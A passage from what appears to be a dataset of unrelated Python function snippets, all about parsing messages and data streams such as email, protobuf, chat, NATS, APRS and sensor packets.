self.parsed[\"X-Jicket-Initial-ReplyID\"] == self.parsed[\"In-Reply-To\"]:\n self.threadstarter = True\n elif self.config.ticketAddress in self.parsed[\"From\"]: # Take more heuristic approach\n self.threadstarter = True\n\n self.rawmailcontent = None # No need to store after processing\n\n self.get_text_bodies(self.parsed)\n self.textfrombodies()", "def extract(self, data):", "def parse(string):\n if string.strip() == Parser.OK_MSG or string.startswith(Parser.NOT_OK_MSG):\n return Parser._handle_ok_ack(string)\n results = Parser._handle_dict(string)\n results.extend(Parser._handle_else(string))\n return results", "def parse(self, data):\r\n\r\n parser.Parser.parse(self, data)\r\n\r\n # in case the current state of the parser is finished, must\r\n # reset the state to the start position as the parser is\r\n # re-starting (probably a new data sequence)\r\n if self.state == FINISH_STATE: self.clear()\r\n\r\n # retrieves the size of the data that has been sent for parsing\r\n # and saves it under the size original variable\r\n size = len(data)\r\n size_o = size\r\n\r\n # iterates continuously to try to process all that\r\n # data that has been sent for processing\r\n while size > 0:\r\n\r\n if self.state <= self.state_l:\r\n method = self.states[self.state - 1]\r\n count = method(data)\r\n if count == -1: break\r\n if count == 0: continue\r\n\r\n size -= count\r\n data = data[count:]\r\n\r\n continue\r\n\r\n elif self.state == FINISH_STATE:\r\n self.clear()\r\n\r\n continue\r\n\r\n else:\r\n raise netius.ParserError(\"Invalid state '%d'\" % self.state)\r\n\r\n # in case not all of the data has been processed\r\n # must add it to the buffer so that it may be used\r\n # latter in the next parsing of the message\r\n if size > 0: self.buffer.append(data)\r\n\r\n # returns the number of read (processed) bytes of the\r\n # data that has been sent to the parser\r\n return size_o - size", "def _decode_message(self, label: str, buf, typedef=None, pos=0, end=None, group=False):\n print(str(pos) + \" decode_message \" + label)\n if end is None:\n end = len(buf)\n\n if typedef is None:\n typedef = {}\n else:\n # Don't want to accidentally modify the original\n typedef = copy.deepcopy(typedef)\n output = {}\n\n while pos < end:\n oldpos = pos\n tag, pos = decoder._DecodeVarint(buf, pos)\n try:\n field_number, wire_type = wire_format.UnpackTag(tag)\n except Exception as exc:\n raise (ValueError,\n 'Could not read valid tag at pos %d. Ensure it is a valid protobuf message: %s'\n % (pos-len(tag), exc), sys.exc_info()[2])\n # Convert to str\n field_number = str(field_number)\n orig_field_number = field_number\n \n field_typedef = None\n if field_number in typedef:\n field_typedef = typedef[field_number]\n else:\n field_typedef = {}\n field_typedef['type'] = self.wire_type_defaults[wire_type]\n field_type = field_typedef['type']\n if self.debug:\n ft = field_type\n if ft == None:\n ft = \"None\"\n print(\"@\" + str(oldpos) + \"-\" + str(pos-1) + \":\" + label + \" field_number \" +\n str(field_number) +\n \" wire_type \" + str(wire_type) +\n \" field_type \" + str(ft))\n # If field_type is None, its either an unsupported wire type, length delim or group\n # length delim we have to try and decode first\n field_out = None\n if field_type == 'LD':\n field_out, pos = self.decode_message_LD(label, buf, pos, field_typedef)\n elif field_type == 'endGroup':\n # TODO Should probably match the field_number to START_GROUP\n if not group:\n raise ValueError(\"Found END_GROUP before START_GROUP\")\n # exit out\n return output, typedef, pos\n elif field_type == 'message':\n field_out, pos = self.decode_message_message(\n label, buf, pos, field_typedef, field_number)\n elif field_type == 'group':\n group_typedef = None\n # Check for a anonymous type\n if 'group_typedef' in field_typedef:\n group_typedef = field_typedef['group_typedef']\n field_out, group_typedef, pos = self.decode_group(\n label, buf, group_typedef, pos)\n # Save type definition\n field_typedef['group_typedef'] = group_typedef\n else:\n # Verify wiretype matches\n if self.wiretypes[field_type] != wire_type:\n raise ValueError(\"Invalid wiretype for field number %s. %s is not wiretype %s\"\n % (field_number, field_type, wire_type))\n # Simple type, just look up the decoder\n field_out, pos = self.decoders[field_type](buf, pos)\n field_typedef['type'] = field_type\n if 'name' not in field_typedef:\n field_typedef['name'] = ''\n field_key = field_number\n if '-' not in field_number and 'name' in field_typedef and field_typedef['name'] != '':\n field_key = field_typedef['name']\n # Deal with repeats\n if field_key in output:\n if isinstance(field_out, list):\n if isinstance(output[field_number], list):\n output[field_key] += field_out\n else:\n output[field_key] = field_out.append(output[field_key])\n else:\n if isinstance(output[field_number], list):\n output[field_key].append(field_out)\n else:\n output[field_key] = [output[field_key], field_out]\n else:\n output[field_key] = field_out\n typedef[orig_field_number] = field_typedef\n if self.debug:\n print(str(field_key) + \" field_out:\" + str(field_out))\n if pos > end:\n raise decoder._DecodeError(\"Invalid Message Length, pos=\" +\n str(pos) + \" end=\" + str(end))\n # Should never hit here as a group\n if group:\n raise ValueError(\"Got START_GROUP with no END_GROUP.\")\n print(\"decode_message finish \" + str(pos))\n return output, typedef, pos", "def postparse(self, parse_result):\n return parse_result", "def _parseData(self, payload):\n out=[]\n bytesParsed = 0\n while bytesParsed < len(payload):\n\n #check for the extended Code Level, code and length\n #count the number of EXCODE_BYTE\n #extendedCodeLevel = sum([1 for x in data if x == EXCODE_BYTE] )\n #bytesParsed += extendedCodeLevel\n\n #identify the length of the expected bytes in the payload\n code = payload[bytesParsed]\n bytesParsed +=1\n if code > 0x7F:\n # multi-byte code, length > 1\n length = payload[bytesParsed]\n bytesParsed +=1\n else:\n length = 1\n\n if code == SENSOR_STATUS:\n # value of 0==no contact, 200==contact\n #print \"leadoff: %i\" % payload[bytesParsed]\n out.append( {'timestamp': self.curtime, 'leadoff': payload[bytesParsed] } )\n bytesParsed +=1\n\n elif code == HEART_RATE:\n #print \"HR: %i\" % payload[bytesParsed]\n out.append( {'timestamp': self.curtime, 'HR': payload[bytesParsed:] } )\n bytesParsed +=1\n\n elif code == CONFIG_BYTE:\n #print \"config: %i\" % payload[bytesParsed]\n out.append( {'timestamp': self.curtime, 'config': payload[bytesParsed:] } )\n bytesParsed +=1\n\n elif code == RAW_ECG:\n # raw value is between -32768 and 32767, in twos compliment form\n # if the raw value is higher than 32768, it should be rolled around to allow for negative values\n raw = payload[bytesParsed]*256 + payload[bytesParsed]\n if raw >= 32768: \n raw = raw - 65536\n #print \"ecg: %i\" % ecg\n\n # create the timestamp on each ECG sample, starting from the first\n if self.starttime is None:\n self.starttime = time.time()\n self.curtime = self.starttime\n else:\n self.curtime = self.curtime + 1./self.Fs\n\n out.append( {'timestamp': self.curtime, 'ecg_raw': raw } )\n bytesParsed += length\n\n elif code == DEBUG_1:\n #print \"debug1: \" + str(payload[bytesParsed:]).strip('[]')\n out.append( {'timestamp': self.curtime, 'debug1': payload[bytesParsed:] } )\n bytesParsed += length\n\n elif code == DEBUG_2:\n #print \"debug2: \" + str(payload[bytesParsed:]).strip('[]')\n out.append( {'timestamp': self.curtime, 'debug2': payload[bytesParsed:] } )\n bytesParsed += length\n\n else:\n print \"unknown code: %i\" % code\n\n return out", "def _read_message(self):\n if self.__eof:\n return None\n result = {}\n line = sys.stdin.readline()\n while line == '\\n':\n line = sys.stdin.readline()\n if not line:\n self.__eof = True\n return None\n s = line.split(\" \", 1)\n result['_number'] = int(s[0])\n result['_text'] = s[1].strip()\n\n while not self.__eof:\n line = sys.stdin.readline()\n if not line:\n self.__eof = True\n return result\n if line == '\\n':\n return result\n s = line.split(\":\", 1)\n result[s[0]] = s[1].strip()", "def _parse_message(self, data):\r\n if TwitchChatStream._check_has_ping(data):\r\n self._maybe_print('got ping')\r\n self._send_pong()\r\n\r\n channel_name_or_false = TwitchChatStream._check_has_channel(data)\r\n if channel_name_or_false:\r\n current_channel = channel_name_or_false[0]\r\n print('Connected to channel: ' + current_channel)\r\n\r\n if TwitchChatStream._check_has_message(data):\r\n msg = {\r\n 'channel': re.findall(r'^:.+![a-zA-Z0-9_]+'\r\n r'@[a-zA-Z0-9_]+'\r\n r'.+ '\r\n r'PRIVMSG (.*?) :',\r\n data)[0],\r\n 'username': re.findall(r'^:([a-zA-Z0-9_]+)!', data)[0],\r\n 'message': re.findall(r'PRIVMSG #[a-zA-Z0-9_]+ :(.+)',\r\n data)[0]\r\n }\r\n if msg['channel'].startswith('#'):\r\n msg['channel'] = msg['channel'][1:]\r\n self._maybe_print(\r\n 'got msg: #{} @{} -- {}'.format(msg['channel'], msg['username'], msg['message']))\r\n return msg\r\n elif len(data):\r\n self._maybe_print('other data: {}'.format(data))\r\n else:\r\n return None", "def handle_message(self, data, task_type, msgtype):\n data['message'] = data['message'].upper()\n return data", "def _parse_reply(self, msg_list): #{\n logger = self.logger\n\n if len(msg_list) < 4 or msg_list[0] != b'|':\n logger.error('bad reply: %r' % msg_list)\n return None\n\n msg_type = msg_list[2]\n data = msg_list[3:]\n result = None\n srv_id = None\n\n if msg_type == b'ACK':\n srv_id = data[0]\n elif msg_type in (b'OK', b'YIELD'):\n try:\n result = self._serializer.deserialize_result(data)\n except Exception, e:\n msg_type = b'FAIL'\n result = e\n elif msg_type == b'FAIL':\n try:\n error = jsonapi.loads(msg_list[3])\n if error['ename'] == 'StopIteration':\n result = StopIteration()\n elif error['ename'] == 'GeneratorExit':\n result = GeneratorExit()\n else:\n result = RemoteRPCError(error['ename'], error['evalue'], error['traceback'])\n except Exception, e:\n logger.error('unexpected error while decoding FAIL', exc_info=True)\n result = RPCError('unexpected error while decoding FAIL: %s' % e)\n else:\n result = RPCError('bad message type: %r' % msg_type)\n\n return dict(\n type = msg_type,\n req_id = msg_list[1],\n srv_id = srv_id,\n result = result,\n )", "def parse_data(self):\n\n msg = self.xml['dom'].childNodes[0]\n self.data = xml_to_dicts(msg, False)\n\n # Get some metadata together\n self.id = \"%s:%s\" % (self.data['src']['name']['#cdata'], self.data['src']['id']['#cdata'])\n self.temp = self.data['tmpr']['#cdata']\n self.watts = self.data['ch1']['watts']['#cdata']\n\n # Time - CurrentCost and local\n self.date = {}\n self.date['cc'] = [ int(self.data['date'][k]['#cdata']) for k in ('dsb','hr','min','sec') ]\n self.date['now'] = localtime()", "def parse(self, data):\n self._data = data\n return self._parse_headers()", "def __parse(self):\n lines = self.data.readlines()\n for i in range(0, len(lines)):\n line = lines[i]\n if line[0] == '#':\n continue\n tokens = line.split(\"\\t\")\n time_str = tokens[self.timecol]\n if time_str.find('start:') != -1:\n time_str = time_str.split()[1] + \" \" + time_str.split()[2]\n self.calls.append((0, 0, 0))\n self.durations.append(0.0)\n elif time_str.find('end:') != -1:\n time_str = time_str.split()[1] + \" \" + time_str.split()[2]\n time = datetime.strptime(time_str, \"%Y-%m-%d %H:%M:%S\")\n self.times.append(time)\n self.calls.append((0, 0, 0))\n self.durations.append(0.0)\n break\n else:\n duration = float(tokens[6])\n fms = int(tokens[2])\n hfms = int(tokens[3])\n svs = int(tokens[4])\n self.calls.append((fms, hfms, svs))\n self.durations.append(duration)\n time = datetime.strptime(time_str, \"%Y-%m-%d %H:%M:%S\")\n self.times.append(time)\n self.length = (self.times[len(self.times) - 1] -\\\n self.times[0]).seconds", "def parse(self, data=''):\n self.scratch += data\n for i in self.scratch:\n if self.state == AWAITING_CONTROL_LINE:\n\n # MSG\n if self.scratch.startswith(MSG_OP):\n self.state = AWAITING_MSG_ARG\n\n # OK\n elif self.scratch.startswith(OK):\n # No op. But still consume OK from buffer and set next state.\n if len(self.scratch) > OK_SIZE:\n self.scratch = self.scratch[OK_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE\n\n # -ERR\n elif self.scratch.startswith(ERR_OP):\n self.state = AWAITING_MINUS_ERR_ARG\n\n # PONG\n elif self.scratch.startswith(PONG):\n self.nc._process_pong()\n\n if len(self.scratch) > PONG_SIZE:\n self.scratch = self.scratch[PONG_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE\n\n # PING\n elif self.scratch.startswith(PING):\n self.nc.send_command(PONG)\n if len(self.scratch) > PING_SIZE:\n self.scratch = self.scratch[PING_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE\n\n elif self.state == AWAITING_MSG_ARG:\n i = self.scratch.find(_CRLF_)\n if i > 0:\n line = self.scratch[:i]\n args = line.split(_SPC_)\n\n # Check in case of using a queue\n args_size = len(args)\n if args_size == 5:\n self.msg_arg[\"subject\"] = args[1]\n self.msg_arg[\"sid\"] = int(args[2])\n self.msg_arg[\"reply\"] = args[3]\n self.needed = int(args[4])\n elif args_size == 4:\n self.msg_arg[\"subject\"] = args[1]\n self.msg_arg[\"sid\"] = int(args[2])\n self.msg_arg[\"reply\"] = \"\"\n self.needed = int(args[3])\n else:\n raise ErrProtocol(\"Wrong number of arguments in MSG\")\n self.scratch = self.scratch[i+CRLF_SIZE:]\n self.state = AWAITING_MSG_PAYLOAD\n\n elif self.state == AWAITING_MSG_PAYLOAD:\n if len(self.scratch) >= self.needed:\n payload = self.scratch[:self.needed]\n subject = self.msg_arg[\"subject\"]\n sid = self.msg_arg[\"sid\"]\n reply = self.msg_arg[\"reply\"]\n\n # Set next stage already before dispatching to callback\n self.scratch = self.scratch[self.needed:]\n self.state = AWAITING_MSG_END\n\n msg = Msg(subject=subject, sid=sid, reply=reply, data=payload)\n self.nc._process_msg(msg)\n\n elif self.state == AWAITING_MSG_END:\n i = self.scratch.find(MSG_END)\n if i > 0:\n self.scratch = self.scratch[i+1:]\n self.state = AWAITING_CONTROL_LINE\n\n # -ERR 'error'\n elif self.state == AWAITING_MINUS_ERR_ARG:\n i = self.scratch.find(_CRLF_)\n if i > 0:\n line = self.scratch[:i]\n _, err = line.split(_SPC_, 1)\n self.nc._process_err(err)\n if len(self.scratch) > i+CRLF_SIZE:\n self.scratch = self.scratch[i+CRLF_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE", "def send_and_parse(self, cmd):\n\n lines = self.__send(cmd)\n messages = self.__protocol(lines)\n return messages", "def on_data(self, raw_data):\n data = json.loads(raw_data)\n\n if \"in_reply_to_status_id\" in data:\n status = Status.parse(None, data)\n return self.on_status(status)\n if \"delete\" in data:\n delete = data[\"delete\"][\"status\"]\n return self.on_delete(delete[\"id\"], delete[\"user_id\"])\n if \"disconnect\" in data:\n return self.on_disconnect_message(data[\"disconnect\"])\n if \"limit\" in data:\n return self.on_limit(data[\"limit\"][\"track\"])\n if \"scrub_geo\" in data:\n return self.on_scrub_geo(data[\"scrub_geo\"])\n if \"status_withheld\" in data:\n return self.on_status_withheld(data[\"status_withheld\"])\n if \"user_withheld\" in data:\n return self.on_user_withheld(data[\"user_withheld\"])\n if \"warning\" in data:\n return self.on_warning(data[\"warning\"])\n\n log.error(\"Received unknown message type: %s\", raw_data)", "def message_parser(msg):\n # Start a new message\n new_msg = {\n \"messageType\": msg[\"messageType\"],\n \"messageID\": msg[\"messageID\"],\n \"messageURL\": msg[\"messageURL\"],\n \"messageIssueTime\": msg[\"messageIssueTime\"],\n 'messageBody': {}\n }\n # Break down the incoming message's messageBody and save to new message\n sections = msg[\"messageBody\"].split(\"\\n## \")\n for part in sections:\n try:\n header, body = part.split(\":\", 1) # only split on first occurrence of colon, not all occurrences (ie dates)\n header = header.strip(\"##\").replace(\" \", \"_\").lower() # clean up headers\n body = body.lstrip(\" \").replace(\"\\n\", \" \").replace(\"#\", \"\")\n if header:\n new_msg[\"messageBody\"][header] = body\n except ValueError:\n continue\n # Break down notes if present and save to new message\n if \"notes\" in new_msg[\"messageBody\"] and new_msg[\"messageBody\"][\"notes\"]:\n try:\n notes_wo_dsc = new_msg[\"messageBody\"][\"notes\"].split(\"Disclaimer\")[0] # First set the important stuff to a var\n new_msg[\"messageBody\"][\"notes\"] = {} # now turn notes into an object\n parent_header, children = notes_wo_dsc.split(\":\", 1)\n parent_header = parent_header.lstrip(\" \")\n new_msg[\"messageBody\"][\"notes\"][parent_header] = {} # make a new object for more children\n child_parts = children.split(\" \")\n child_header = None\n new_body = \"\"\n for part in child_parts:\n if part.endswith(\":\"):\n child_header = part.strip(\":\")\n else:\n new_body += part + \" \"\n if child_header:\n new_msg[\"messageBody\"][\"notes\"][parent_header][child_header] = new_body\n except ValueError:\n pass\n # We don't need the disclaimers taking up memory\n if \"disclaimer\" in new_msg[\"messageBody\"]:\n del new_msg[\"messageBody\"][\"disclaimer\"]\n return new_msg", "def process_messages(self):\n pass", "def parse(cls, s):\n raise NotImplementedError", "def __processMsg(self, sock, msgData):\n\n pass", "def parse(self, serialized):\n raise NotImplementedError(\"Calling an abstract method.\")", "def parse(self): \n pass", "def parse_data( self ):\n self.parsed_data = dict( self.results )", "def parse_and_decode(cls, data: bytes) -> \"Message\":\n if len(data) < cls.calc_size() + 1:\n raise NotEnoughData()\n if data[0] != cls.type:\n raise InvalidType()\n\n return cls(*unpack('<' + cls.fmt, data[1:cls.calc_size() + 1]))", "def parse(self):\n raise NotImplementedError(\"Parse not specified!\")", "def __call__(self,data):\n\n log.debug('got data: %s' % (len(data)))\n\n # if we don't have args yet, these must be them\n if not self.args:\n self.parse_args(data)\n\n else:\n # we've already got args, must\n # be a message\n self.handle_send(data)", "def parse_messages(self, orig):\n data=orig[1:len(orig)-1]\n output=[]\n for i in range(0, len(data), 3):\n message_data=data[i].split(',')\n message_text=data[i+1]\n output.append({'status':message_data[1], 'number':message_data[2],'date':message_data[4],'time':message_data[5],'text':message_text})\n return output", "def handle_data(self, data):\n if verbose(): print(\"TIParser.handle_data(self, '%s')\" % (data))\n pass", "def process_MESSAGE_TYPE_EMG(self, raw):\n\n pass", "def parse(self):\n\t\tfor part in self.mail.walk():\n\t\t\tself.process_part(part)", "def parse(self):\n return []", "def process_messages(self):\n for each_message in self.unprocessed_messages:\n if not ( 'message_type' in each_message):\n logging.error(\"(%s:%d) invalid message found...ignoring the message\",\\\n self.ip, self.port)\n else:\n if ( each_message['message_type'] is 'unchoke'):\n self.is_choking = 0\n elif ( each_message['message_type'] is 'choke'):\n self.is_choking = 1\n elif ( each_message['message_type'] is 'interested'):\n self.is_interested = 1\n elif ( each_message['message_type'] is 'not interested'):\n self.is_interested = 0\n elif ( each_message['message_type'] is 'have'):\n self.pieces.append(each_message['piece_index'])\n elif ( each_message['message_type'] is 'bitfield'):\n bitfield = each_message['bitfield']\n for index, each_bit in enumerate(bitfield):\n if ( each_bit is '1'):\n self.pieces.append(index)", "def __init__(self, msg_type=UNKNOWN, data=None):\r\n\r\n # The message class represents that class of message, i.e., STATUS, CONFIG, DEBUG, ACTION\r\n self.msg_class = self.UNKNOWN\r\n # The message type represents the sub-class of message, i.e., ODOMETRY, MOVE, etc. Note: the same message\r\n # type can appear under different classes, e.g., Operational State is both a Config and Status message\r\n self.msg_type = msg_type\r\n # The payload is a list representation of the data contained in the message. Design decision is to keep the\r\n # type as list because it is easy to convert it to a string as necessary, typically for printing.\r\n self.payload = None\r\n\r\n self.msg = \"\"\r\n\r\n # We do this part if we are creating a message from parameters, e.g. a list\r\n # and we need to create a string that can be sent over the serial port\r\n if type(data) is list:\r\n self._parse_list_msg(data)\r\n\r\n # We do this part if we are creating a message from a string received over the serial port\r\n # e.g., the data received is a string that needs to be parsed\r\n elif type(data) is str or type(data) is unicode: # This can be either 'str' or 'unicode'. Both are handled basically as string\r\n self.msg = data.lstrip().rstrip()\r\n result = self._is_valid(self.msg)\r\n if result:\r\n self._parse_str_msg(self.msg)\r\n else:\r\n raise SerialMessageError(\"Failed to validate data: \", data)\r\n else:\r\n raise SerialMessageError(\"Unknown handled for data: \", type(data))", "def receive(self):\n data = self._read()\n if data == b'':\n return None\n\n type = self.MsgHeader.unpack(data).type\n data = data[self.MsgHeader.size:]\n\n if type == self.SONY_MSG_Common:\n header = self.CommonMsgHeader.unpack(data)\n data = data[self.CommonMsgHeader.size:header.size]\n if header.type == self.SONY_MSG_Common_Hello:\n n = self.ProtocolMsgHeader.unpack(data).numProtocols\n protos = (self.ProtocolMsgProto.unpack(data, self.ProtocolMsgHeader.size+i*self.ProtocolMsgProto.size) for i in range(n))\n return InitResponseMessage([(p.name, p.id) for p in protos])\n elif header.type == self.SONY_MSG_Common_Bye:\n raise Exception('Bye from camera')\n else:\n raise Exception('Unknown common message type: 0x%x' % header.type)\n\n elif type == self.SONY_MSG_Tcp:\n header = self.CommonMsgHeader.unpack(data)\n data = data[self.CommonMsgHeader.size:header.size]\n tcpHeader = self.TcpMsgHeader.unpack(data)\n data = data[self.TcpMsgHeader.size:]\n if header.type == self.SONY_MSG_Tcp_ProxyConnect:\n proxy = self.ProxyConnectMsgHeader.unpack(data)\n host = data[self.ProxyConnectMsgHeader.size:self.ProxyConnectMsgHeader.size+proxy.hostSize]\n return SslStartMessage(tcpHeader.socketFd, host.decode('latin1'), proxy.port)\n elif header.type == self.SONY_MSG_Tcp_ProxyDisconnect:\n return SslEndMessage(tcpHeader.socketFd)\n elif header.type == self.SONY_MSG_Tcp_ProxyData:\n size = self.SslDataMsgHeader.unpack(data).size\n return SslSendDataMessage(tcpHeader.socketFd, data[self.SslDataMsgHeader.size:self.SslDataMsgHeader.size+size])\n else:\n raise Exception('Unknown tcp message type: 0x%x' % header.type)\n\n elif type == self.SONY_MSG_Rest:\n header = self.RestMsgHeader.unpack(data)\n data = data[self.RestMsgHeader.size:self.RestMsgHeader.size+header.size]\n if header.type == self.SONY_MSG_Rest_Out:\n return ResponseMessage(data)\n elif header.type == self.SONY_MSG_Rest_In:\n return RequestMessage(data)\n else:\n raise Exception('Unknown rest message type: 0x%x' % header.type)\n\n else:\n raise Exception('Unknown message type: 0x%x' % type)", "def parse_message(data):\r\n\tlist_data = data.split(\"|\")\r\n\tcmd = list_data[0]\r\n\tif len(list_data) != 3 or len(cmd) != CMD_FIELD_LENGTH:\r\n\t\treturn None, None\r\n\tdata_len = list_data[1].replace(\" \", \"\")\r\n\tif len(data_len) != LENGTH_FIELD_LENGTH or not data_len.isdigit():\r\n\t\treturn None, None\r\n\tmsg = list_data[2]\r\n\tdata_len = int(data_len)\r\n\tif len(msg) != data_len \\\r\n\t\tor not 0 <= data_len <= 9999:\r\n\t\treturn None, None\r\n\tcmd = cmd.replace(\" \", \"\") # remove spaces\r\n\t# The function should return 2 values\r\n\treturn cmd, msg", "def _parse_response(resp):\n for header in resp['payload']['headers']:\n if header['name'] == 'From':\n email = _parse_email_value(header['value'])\n sender_user_id = EMAIL_TO_USER_ID.get(email)\n if not sender_user_id:\n print(\"sender_user_id not found {}\".format(email))\n return\n\n if resp['payload']['mimeType'] in ['text/html', 'text/plain']:\n encoded_data = resp['payload']['body']['data'].encode('utf-8')\n body = base64.urlsafe_b64decode(encoded_data)\n else:\n # unclear if other options may come through\n print(\"found new mimeType: {}, id: {}\".format(resp['payload']['mimeType'], resp['id']))\n return\n\n # we only care about chat labels for now\n label = 'chats' if 'chats' in resp['labelIds'] else None\n time_secs = int(resp['internalDate']) / 1000 # convert to seconds\n timestamp = datetime.fromtimestamp(time_secs)\n\n return MessageData(\n body=body,\n timestamp=timestamp,\n message_id=resp['id'],\n label=label,\n data=json.dumps(resp),\n sender_user_id=sender_user_id,\n thread_id=resp['threadId']\n )", "def parse_message(self, message):\n # This should run in a separate thread\n message = pickle.loads(message)\n self.logger.log_bytes(message)\n\n if message[0] == \"set\":\n return self.cache.set(message[1], message[2])\n\n elif message[0] == \"del\":\n return self.cache.delete(message[1])\n\n elif message[0] == \"get\":\n return self.cache.get(message[1])\n\n elif message[0] == \"add\":\n return self.cache.add(message[1], message[2])\n\n else:\n print(\"Only these keywords are supported: get, set, delete\")\n\n return message", "def after_parsing(self):", "def processCompleteMessage(self, msg):\r\n try:\r\n msgType = msg['type']\r\n data = msg['data']\r\n except KeyError as e:\r\n raise InvalidRequest('Message is missing key: {0}'.format(e))\r\n\r\n if msgType == types.DATA_MESSAGE:\r\n self._process_DataMessage(data)\r\n elif msgType == types.CONFIGURE_COMPONENT:\r\n self._process_configureComponent(data)\r\n elif msgType == types.CONFIGURE_CONNECTION:\r\n self._process_configureConnection(data)\r\n elif msgType == types.CREATE_CONTAINER:\r\n self._process_createContainer(data)\r\n elif msgType == types.DESTROY_CONTAINER:\r\n self._process_destroyContainer(data)\r\n else:\r\n raise InvalidRequest('This message type is not supported.')", "def parse_webhook_data(self, data):\n\n message = data['message']\n\n self.chat_id = message['chat']['id']\n self.incoming_message_text = message['text'].lower()\n self.first_name = message['from']['first_name']\n if 'last_name' in message['from']:\n self.last_name = message['from']['last_name']", "def deserialize(self, data):\r\n self.res = data.split()\r\n return self.search_deserialize()", "def parse(data):\n parser=Parser(data, True)\n return parser.parse()", "def _parseRecords(self):\n # dict of parse methods for most common records that will be stored in structured arrays\n FLAG2METHOD = {'PS' : self.parseHighPassRecord,\n 'PC' : self.parseLowPassRecord,\n 'VD' : self.parseDigitalSValRecord}\n # dict of (record type, listname to store it in) tuples\n FLAG2REC = {'L' : (LayoutRecord, 'layoutrecords'),\n 'MS' : (SurfMessageRecord, 'messagerecords'),\n 'MU' : (UserMessageRecord, 'messagerecords'),\n 'PE' : (EpochRecord, 'epochrecords'),\n 'D' : (DisplayRecord, 'displayrecords'),\n 'VA' : (AnalogSValRecord, 'analogsvalrecords')}\n f = self.f\n while True:\n # returns an empty string when EOF is reached\n flag = f.read(2).rstrip(NULL).decode() # TODO: should this strip NULL?\n if flag == '':\n break\n # put file pointer back to start of flag\n f.seek(-2, 1) # TODO: unnecessary - doesn't this slow down parsing quite a bit?\n if flag in FLAG2METHOD: # these are the most common\n FLAG2METHOD[flag](f) # call the method\n elif flag in FLAG2REC:\n rectype, reclistname = FLAG2REC[flag]\n rec = rectype()\n rec.parse(f)\n #wx.Yield() # allow wx GUI event processing during parsing\n self._appendRecord(rec, reclistname)\n else:\n raise ValueError('Unexpected flag %r at offset %d' % (flag, f.tell()))\n #self.percentParsed = f.tell() / self.filesize * 100", "def parse(self, data, s):\n fn = s.fileno()\n\n perf = re.compile(\"<xml><perf>(\\d+)</perf></xml>\")\n numbers = re.compile(\"<xml>(?:<number>(\\d+)</number>)+</xml>\")\n\n if not self.accepting:\n self.mq[fn].put_nowait(\"die\\n\")\n self.inputs.remove(s)\n else:\n self.log(\"Recieved %s from %s\", repr(data),\n self.conns[s].addr)\n\n has_perf = perf.match(data)\n has_nums = numbers.match(data)\n\n if data == \"quit\":\n # Goto self.signal\n kill(getpid(), SIGINT)\n elif data == \"current\":\n worker = self.curWorker\n if not worker:\n worker = \"None\"\n self.mq[fn].put(str(worker) + '\\n')\n elif has_perf:\n self.mq[fn].put(\"<xml><range>\"+str(self.seqNum)+\"</range></xml>\")\n self.seqNum += int(has_perf.group(1))\n self.curWorker = str(self.conns[s])\n self.log(\"Sequence now: %s\", self.seqNum)\n elif has_nums:\n self.perfect_numbers.append(list(has_nums.groups()))\n self.log(\"Found perfect numbers: %s\",\n str(list(has_nums.groups())))\n\n if s not in self.outputs:\n self.outputs.append(s)", "def _decode(self, msgCls, data):\r\n rosMsg = msgCls()\r\n\r\n for (slotName, slotType) in zip(rosMsg.__slots__, rosMsg._slot_types):\r\n if slotName not in data:\r\n continue\r\n\r\n if '[]' == slotType[-2:]:\r\n listBool = True\r\n slotType = slotType[:-2]\r\n else:\r\n listBool = False\r\n\r\n field = data[slotName]\r\n\r\n if listBool and not isinstance(field, (list, tuple)):\r\n raise TypeError('Given data does not match the definition of '\r\n 'the ROS message.')\r\n\r\n if slotType == 'string':\r\n convFunc = _stringify\r\n elif slotType in self._BASE_TYPES:\r\n convFunc = self._BASE_TYPES[slotType]\r\n elif slotType in self._SPECIAL_TYPES:\r\n convFunc = self._SPECIAL_TYPES[slotType]().decode\r\n elif slotType in self._customTypes and _checkIsStringIO(field):\r\n convFunc = self._customTypes[slotType][0]().decode\r\n else:\r\n convFunc = partial(self._decode,\r\n self._loader.loadMsg(*slotType.split('/')))\r\n\r\n if listBool:\r\n convFunc = partial(map, convFunc)\r\n\r\n setattr(rosMsg, slotName, convFunc(field))\r\n\r\n return rosMsg", "def _parse_data(data: str) -> Tuple[str, str, str, int, int, int, str]:\n\n phg = None\n rng = None\n dfs = None\n course = None\n speed = None\n altitude = None\n comment = None\n\n if re.match(r'^PHG[0-9]{4}', data[:7]):\n # Packet has a PHG (power, antenna height/gain/directivity) value\n phg = data[3:7]\n logger.debug(\"PHG is {}\".format(phg))\n data = data[7:]\n\n elif re.match('^RNG[0-9]{4}', data[:7]):\n # Packet has an RNG (radio range) value\n rng = data[3:7]\n logger.debug(\"RNG is {}\".format(rng))\n data = data[7:]\n\n elif re.match('^DFS[0-9]{4}', data[:7]):\n # Packet has a DFS (DF signal strength, antenna height/gain/directivity) value\n dfs = data[3:7]\n logger.debug(\"DFS is {}\".format(dfs))\n data = data[7:]\n\n elif re.match('^[0-9]{3}/[0-9]{3}', data[:7]):\n # Packet has course and speed values\n course = int(data[:3])\n speed = int(data[4:7])\n logger.debug(\"Course is {}, speed is {}\".format(course, speed))\n data = data[7:]\n\n # TODO - parse BRG/NRQ\n\n # Check for comment\n if len(data) > 0:\n\n # Check for altitude\n # As per APRS 1.01 C6 P26, altitude as /A=nnnnnn may appear anywhere in the comment\n has_altitude = re.match('.*/A=([0-9]{6}).*', data)\n if has_altitude:\n # TODO - fix altitude format\n altitude = int(has_altitude.groups()[0])\n logger.debug(\"Altitude is {} ft\".format(altitude))\n\n # Strip out the altitude from the comment\n data = re.sub(r'/A=[0-9]{6}', \"\", data)\n\n # Set the comment as the remainder of the information field\n comment = data\n logger.debug(\"Comment is {}\".format(comment))\n\n return (phg, rng, dfs, course, speed, altitude, comment)", "def parse_record(self, record):\n raise NotImplementedError()", "def parse(self, buf: memoryview, params: Params) \\\n -> tuple[ParseableTypeT_co, memoryview]:\n ...", "def parse_xml_data(self, xml_post_data):\n try:\n read_handler = parse_xmlrpc(xml_post_data)\n except:\n raise ValueError(ERR_MSG % xml_post_data[:50])\n else:\n # Tried to do this with self.update but it was failing :S\n for k, v in read_handler.get_data_container().items():\n self[k] = v", "def _parse_data(self, queue_msg):\r\n try:\r\n result = json.loads(queue_msg)\r\n except (TypeError, ValueError):\r\n log.error(\"External message should be a JSON serialized 